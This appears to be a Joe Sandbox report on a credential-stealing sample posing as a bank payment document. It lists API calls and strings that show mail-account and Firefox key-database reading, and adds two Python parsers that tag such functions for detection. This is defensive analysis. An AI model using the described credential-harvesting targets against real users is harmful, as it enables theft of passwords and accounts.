• String ID: %s (%s)
• API String ID: 3756086014-1363028141
• Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
• Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
• Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
• Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
APIs
• UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
• UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
• memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
• CoTaskMemFree.COMBASE(?), ref: 004108D2
Strings
• 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
• 00000000-0000-0000-0000-000000000000, xrefs: 00410882
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: FromStringUuid$FreeTaskmemcpy
• String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
• API String ID: 1640410171-3316789007
• Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
• Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
• Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
• Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _mbscat$memsetsprintf
• String ID: %2.2X
• API String ID: 125969286-791839006
• Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
• Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
• Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
• Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
APIs
  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
• ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
• SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
  • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
  • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
  • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
  • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
  • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
• ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
• CloseHandle.KERNEL32(?), ref: 00444206
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
• String ID: ACD
• API String ID: 1886237854-620537770
• Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
• Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
• Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
• Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
APIs
• memset.MSVCRT ref: 004091EC
• sprintf.MSVCRT ref: 00409201
  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
  • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
• SetWindowTextA.USER32(?,?), ref: 00409228
• EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
• String ID: caption$dialog_%d
• API String ID: 2923679083-4161923789
• Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
• Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
• Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
• Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
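The function records above are machine-generated, and the fields worth correlating across samples (the set of imported APIs, the string xrefs, and the Instruction Fuzzy Hash under Similarity) are buried in bullet lists. The parser below is an added example written for this page; it is not part of the Joe Sandbox report or of Joe Sandbox's own tooling. It turns records in this layout into structured objects. SAMPLE is an excerpt of two records from this page (the UuidFromStringA block and the *.oeaccount reader block) with their Memory Dump Source, IDA Plugin and most Similarity lines dropped to keep it short; the class and helper names (ApiCall, FunctionRecord, parse_records, api_names, fuzzy_hash_index) are my own.

```python
"""Parse Joe Sandbox per-function records (APIs / Strings / Similarity sections)
into structured objects. Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# One API bullet: optional 'Part of subcall function XXXXXXXX: ' prefix, then
# name.MODULE, optional (args), then ', ref: ADDR' (or ' ref: ADDR' when no parens).
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>[^.(]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                           # call-site address in the dumped image
    via_subcall: Optional[str] = None  # callee address when listed as 'Part of subcall function'


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[Tuple[str, str]] = field(default_factory=list)  # (string, xref address)
    similarity: Dict[str, str] = field(default_factory=dict)       # API ID, Opcode ID, fuzzy hashes
    source: Dict[str, List[str]] = field(default_factory=dict)     # Source File / Associated / Snapshot File


def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("Download File"):   # web-page link residue on 'Associated:' lines
            line = line[: -len("Download File")].rstrip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":               # every record opens with its APIs section
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None:                  # text before the first record
            continue
        if line.startswith("•"):
            line = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = m.group("args").split(",") if m.group("args") is not None else []
                current.apis.append(ApiCall(m.group("api"), m.group("mod"), args,
                                            m.group("ref").upper(), m.group("sub")))
        elif section == "Strings":
            s, sep, xref = line.rpartition(", xrefs: ")
            if sep:
                current.strings.append((s, xref.upper()))
        elif section == "Similarity":
            key, sep, value = line.partition(": ")
            if sep:
                current.similarity[key] = value
        else:                                # Memory Dump Source / Joe Sandbox IDA Plugin
            key, sep, value = line.partition(": ")
            if sep:
                current.source.setdefault(key, []).append(value)
    return records


def api_names(record: FunctionRecord) -> List[str]:
    """Distinct APIs the function calls directly (imports reached only via subcalls excluded)."""
    return sorted({c.api for c in record.apis if c.via_subcall is None})


def fuzzy_hash_index(records: List[FunctionRecord]) -> Dict[str, FunctionRecord]:
    """Instruction Fuzzy Hash -> record, the key for matching a function in another sample's report."""
    return {r.similarity["Instruction Fuzzy Hash"]: r
            for r in records if "Instruction Fuzzy Hash" in r.similarity}


# Excerpt of two records from this report (constructed sample for the parser).
SAMPLE = """\
APIs
• UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
• UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
• memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
• CoTaskMemFree.COMBASE(?), ref: 004108D2
Strings
• 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
• 00000000-0000-0000-0000-000000000000, xrefs: 00410882
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FromStringUuid$FreeTaskmemcpy
• Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
APIs
  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
• ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
• SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
• ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
• CloseHandle.KERNEL32(?), ref: 00444206
Strings
Similarity
• API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
• String ID: ACD
• Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
"""
```

Run `parse_records(open("report.txt").read())` on a report saved as text, then `fuzzy_hash_index` across several samples' records to find functions shared between payloads; `api_names` gives the direct-import set per function, which is what you would pair with the string xrefs when writing a rule for, say, the *.oeaccount reader. Calls reported as "Part of subcall function" are kept (with the callee address in `via_subcall`) but excluded from `api_names`, because Joe Sandbox attributes them to the callee, not to the function whose record you are reading.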
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                                                                                                                          • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                                                                                                                          • unknown error, xrefs: 004277B2
                                                                                                                                                                                                                                          • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                                                                                                                          • no such savepoint: %s, xrefs: 00426A02
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpy
• String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
• API String ID: 3510742995-3035234601
Similarity
• API ID: memset
• String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
• API String ID: 2221118986-3608744896
APIs
• memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
  • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
Similarity
• API ID: memcmpmemcpy
• String ID: BINARY$NOCASE$RTRIM$main$temp
• API String ID: 1784268899-4153596280
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
• memset.MSVCRT ref: 00410246
• memset.MSVCRT ref: 00410258
  • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
• memset.MSVCRT ref: 0041033F
• _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
• CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
Similarity
• API ID: memset$_mbscpy$CloseHandleOpenProcess
• String ID:
• API String ID: 3974772901-0
APIs
• wcslen.MSVCRT ref: 0044406C
• ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
• WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
• strlen.MSVCRT ref: 004440D1
  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
• memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
• ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
Similarity
• API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
• String ID:
• API String ID: 577244452-0
APIs
  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
• _strcmpi.MSVCRT ref: 00404518
• _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                                                                          • String ID: imap$pop3$smtp
                                                                                                                                                                                                                                          • API String ID: 2025310588-821077329
                                                                                                                                                                                                                                          • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                                                                                                          • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88

APIs
• memset.MSVCRT ref: 0040C02D
  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76940A60), ref: 00408EBE
  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408E31
  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
  • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
  • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
  • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
  • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
  • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 2726666094-3614832568
• Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
• Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
• Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
• Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99

APIs
• memset.MSVCRT ref: 00403A88
• memset.MSVCRT ref: 00403AA1
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
• strlen.MSVCRT ref: 00403AE9
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ByteCharMultiWidememset$FileWritestrlen
• String ID:
• API String ID: 1786725549-0
• Opcode ID: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
• Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
• Opcode Fuzzy Hash: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
• Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78

APIs
• GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
• GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
• OpenClipboard.USER32(?), ref: 0040C1B1
• GetLastError.KERNEL32 ref: 0040C1CA
• DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
• String ID:
• API String ID: 2014771361-0
• Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
• Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
• Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
• Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68

APIs
• memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
  • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
  • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
  • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
• memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
• memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
• memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID: global-salt$password-check
• API String ID: 231171946-3927197501
• Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
• Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
• Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
• Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
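
Added example, not Joe Sandbox code and not part of this report: a small Python parser that turns the per-function "APIs" / "Similarity" records above into data, so the _strcmpi record with imap/pop3/smtp, the record that transcodes through code page 0xFDE9 before WriteFile, and the memcmp record with global-salt/password-check can be handled by a script instead of read by eye. SAMPLE is a constructed excerpt copied from those three records. Two things in it are analyst-chosen assumptions rather than statements of the page: the capability tags (imap/pop3/smtp grouped as mail-protocol strings; global-salt and password-check, which are the entry names NSS uses in Firefox's legacy key3.db key database, grouped as NSS key-database strings) and the reading of 0xFDE9 as CP_UTF8, which is simply 65001 in hex.

```python
"""Parse Joe Sandbox per-function records ("APIs" / "Similarity" blocks) into data.
Added example, not Joe Sandbox code. SAMPLE is a constructed excerpt copied from this report."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE = """\
APIs
  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
• _strcmpi.MSVCRT ref: 00404518
Similarity
• API ID: _strcmpi$memcpystrlen
• String ID: imap$pop3$smtp
• Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
Similarity
• API ID: ByteCharMultiWidememset$FileWritestrlen
• String ID:
• Opcode ID: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
APIs
• memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
• memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
Similarity
• API ID: memcmp$memcpy
• String ID: global-salt$password-check
• Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
"""

# "• name.MODULE(args), ref: ADDR"; the optional prefix marks a call made inside a helper.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subcall>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[^.\s]+)\.(?P<module>[A-Za-z0-9]+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*?)\s*$")  # "• Key: value"
HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]              # hex words, literal strings, or "?" when unresolved
    ref: str                     # call-site address
    subcall: Optional[str] = None

@dataclass
class Record:
    apis: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)
    def _split(self, key: str) -> list[str]:       # "$" joins the IDs the report lists
        return [s for s in self.fields.get(key, "").split("$") if s]
    @property
    def api_ids(self) -> list[str]: return self._split("API ID")
    @property
    def string_ids(self) -> list[str]: return self._split("String ID")
    @property
    def opcode_id(self) -> str: return self.fields.get("Opcode ID", "")

def parse_records(text: str) -> list[Record]:
    records: list[Record] = []; section = ""
    for line in text.splitlines():
        head = line.strip()
        if head == "APIs":                 # every function record opens with its APIs block
            records.append(Record()); section = head; continue
        if head in HEADERS:
            section = head; continue
        if records and section == "APIs" and (m := API_RE.match(line)):
            raw = m["args"]
            args = [a.strip() for a in raw.split(",")] if raw is not None else []
            records[-1].apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["subcall"]))
        elif records and section == "Similarity" and (m := FIELD_RE.match(line)):
            records[-1].fields[m["key"]] = m["value"]
    return records

CODEPAGES = {0x0: "CP_ACP", 0x1: "CP_OEMCP", 0xFDE9: "CP_UTF8"}  # 0xFDE9 == 65001
def decode_codepage(call: ApiCall) -> Optional[str]:
    """Name the code page passed as argument 0 of the Win32 transcoding APIs."""
    if call.name not in ("MultiByteToWideChar", "WideCharToMultiByte") or not call.args:
        return None
    try:
        cp = int(call.args[0], 16)
    except ValueError:                     # "?": the sandbox could not resolve the value
        return None
    return f"{CODEPAGES.get(cp, 'unknown')} ({cp})"

# Analyst-chosen hints (assumption): a tag applies when all its strings are in String ID.
CAPABILITY_HINTS = {
    "mail-protocol-strings": {"imap", "pop3", "smtp"},
    "nss-key-db-strings": {"global-salt", "password-check"},  # entry names in Firefox key3.db
}

def tag_capabilities(record: Record) -> set[str]:
    present = set(record.string_ids)
    return {tag for tag, needles in CAPABILITY_HINTS.items() if needles <= present}

def index_by_opcode(records: list[Record]) -> dict[str, Record]:
    """Key records on Opcode ID so one function can be joined across two reports."""
    return {r.opcode_id: r for r in records if r.opcode_id}
```

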